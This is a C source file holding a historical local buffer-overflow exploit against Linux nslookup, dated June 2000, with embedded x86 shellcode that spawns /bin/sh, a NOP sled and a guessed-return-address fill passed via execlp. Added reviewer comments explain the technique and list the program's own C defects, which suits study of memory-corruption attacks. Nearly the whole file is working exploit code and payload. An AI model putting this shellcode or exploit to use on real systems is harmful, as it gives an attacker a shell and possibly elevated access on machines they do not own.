/* (linux)nslookup buffer overflow by: v9. smaller/cleaner program of lore's
   ns.c. shellcode is also from ns.c (with some modifications/fixes).
   note: i just made this cause i didn't like the original. i don't think
   it is SUID anywhere by default with any distribution, it would be useless
   to be. */

/* Reviewer note: historical proof-of-concept (trailer dates it 27 June 2000).
   It is a textbook stack-smash: an over-long argv entry made of repeated
   return addresses, a 0x90 sled and a payload.  It also contains several
   C defects of its own, marked below; they are left as-is because the
   behaviour depends on exact stack layout and undefined behaviour, so a
   rewrite could not be verified to preserve it.  Missing headers:
   <stdio.h>, <stdlib.h>, <string.h>, <unistd.h> are never included, so
   atoi/printf/strlen/memcpy/execlp are implicitly declared (invalid since
   C99, an error in C23). */

/* Payload bytes taken from ns.c per the header.  48 bytes, with no 0x00
   byte inside -- the strlen(exec) calls in main() depend on that.  The
   final seven bytes (\x2f\x62\x69\x6e\x2f\x73\x68) are the ASCII text
   "/bin/sh". */
static char exec[]=
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89"
"\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

/* Returns the current stack pointer.
   Defect: there is no C `return`; the function merely moves %esp into %eax
   and falls off the end.  That is undefined behaviour and only "works"
   because, presumably, the i386 ABI hands integer results back in %eax
   (and the compiler does not clobber it before the epilogue). */
long esp(void) { __asm__("movl %esp,%eax"); }

/* Builds the oversized argument and hands it to nslookup.
   argv[1] (optional) is an offset subtracted from the caller's stack
   pointer to form the guessed return address.
   Defects (reviewer):
   - `offset` is read uninitialised when argc <= 1 (indeterminate value,
     UB); the `if(offset)` print then also reads it.
   - The first loop writes a `long` at bof[256]; sizeof(long) >= 4, so the
     write runs past the end of bof[257] on every platform (and on LP64
     the stride-4 `long` stores overlap and overrun even further).
   - Storing through `(long *)&bof[i]` is a misaligned, aliasing-violating
     access.
   - bof is never NUL-terminated: the sled+payload fill bof[0..256]
     exactly, so execlp() reads beyond the array until it meets a zero.
   - `257-strlen(exec)` mixes int and size_t; harmless here only because
     strlen(exec) is 48 < 257.
   - execlp()'s terminating vararg should be `(char *)NULL`, not a bare
     int `0` (wrong size on LP64). */
int main(int argc,char **argv) {
  char bof[257];
  int i,offset;
  long ret;

  /* offset only set when an argument is supplied -- see defect list. */
  if(argc>1) { offset=atoi(argv[1]); }
  ret=(esp()-offset);

  printf("return address: 0x%lx",ret);
  if(offset) { printf(", offset: %d",offset); }
  printf(".\n");

  /* Fill the buffer with copies of the guessed return address, 4 bytes at
     a time; the i==256 iteration writes past the end of bof. */
  for(i=0;i<257;i+=4) { *(long *)&bof[i]=ret; }

  /* Overwrite the front with 0x90 (x86 NOP) up to where the payload goes,
     then copy the payload so it ends exactly at bof[256]. */
  for(i=0;i<(257-strlen(exec));i++) { *(bof+i)=0x90; }
  memcpy(bof+i,exec,strlen(exec));

  /* Replace this process with nslookup, passing bof as its single
     argument.  Returns only on failure; main then falls off the end. */
  execlp("/usr/bin/nslookup","nslookup",bof,0);
}

/* www.hack.co.za [27 June 2000]*/